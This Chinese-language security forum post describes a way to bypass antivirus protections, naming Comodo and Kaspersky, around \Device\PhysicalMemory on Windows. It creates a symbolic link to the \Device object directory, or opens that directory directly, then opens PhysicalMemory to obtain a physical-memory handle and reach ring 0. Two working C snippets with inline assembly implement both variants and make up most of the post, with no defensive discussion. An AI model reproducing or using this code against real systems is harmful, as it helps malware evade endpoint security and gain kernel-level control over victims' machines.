续PhysicalMemory攻击
之前曾讲过通过PhysicalMemory进入RING0的一些绕过攻击方式:
http://bbs.pediy.com/showthread.php?t=89068&highlight=
其中提到的为\Device\PhysicalMemory创建符号链接的方式来绕过对ZwOpenSection打开这个Section的拦截,这个实际很多安全软件都已经防御了,例如Comodo , 卡巴,等等,但是他们仅仅是拦截对\Device\PhysicalMemory的Symbolic Link创建,这样足够吗?
答案当然是否定的。我们仔细看\Device\PhyscialMemory这个路径,实际它由\Device这个对象目录和PhysicalMemory这个Section Name组成,那么很简单了,我们创建对\Device这个对象目录的映射,例如叫123,这个不会有人拦截,然后再打开\123\PhysicalMemory, 这样就绕过了拦截,得到了物理内存对象的句柄,轻松进入RING0,具体实现代码如下:
代码:
HMODULE hlib = LoadLibrary("ntdll.dll"); PVOID pAddr = GetProcAddress(hlib , "ZwOpenSection"); PVOID pAddr2 = GetProcAddress(hlib , "ZwCreateSymbolicLinkObject"); HANDLE shandle ; PHANDLE psechandle = &shandle ; LONG stat ; HANDLE symhandle ; PHANDLE psymhandle = &symhandle; OBJECT_ATTRIBUTES oba ; OBJECT_ATTRIBUTES oba2 ; UNICODE_STRING smbname = RTL_CONSTANT_STRING(L"\\Device"); UNICODE_STRING linkname = RTL_CONSTANT_STRING(L"\\??\\123"); UNICODE_STRING phname = RTL_CONSTANT_STRING(L"\\??\\123\\PhysicalMemory"); InitializeObjectAttributes(&oba2 , &linkname , 0x40 , 0 , 0); InitializeObjectAttributes(&oba , &phname , 0x40 , 0 , 0 ); __asm { lea eax ,smbname push eax lea eax ,oba2 push eax push 1 push psymhandle call pAddr2 lea eax , oba push eax push 2 push psechandle call pAddr }
代码:
HMODULE hlib = LoadLibrary("ntdll.dll"); PVOID pAddr = GetProcAddress(hlib , "ZwOpenSection"); PVOID pAddr3 = GetProcAddress(hlib , "ZwOpenDirectoryObject"); HANDLE shandle ; PHANDLE psechandle = &shandle ; LONG stat ; OBJECT_ATTRIBUTES oba ; UNICODE_STRING smbname = RTL_CONSTANT_STRING(L"\\Device"); UNICODE_STRING phname = RTL_CONSTANT_STRING(L"PhysicalMemory"); HANDLE dirhandle ; PHANDLE pdirhandle = &dirhandle; OBJECT_ATTRIBUTES oba3 ; InitializeObjectAttributes(&oba3 , &smbname , 0x40 , 0 , 0); __asm { lea eax , oba3 push eax push 1 push pdirhandle call pAddr3 } InitializeObjectAttributes(&oba , &phname , 0x40 , dirhandle , 0 ); __asm { lea eax , oba push eax push 2 push psechandle call pAddr }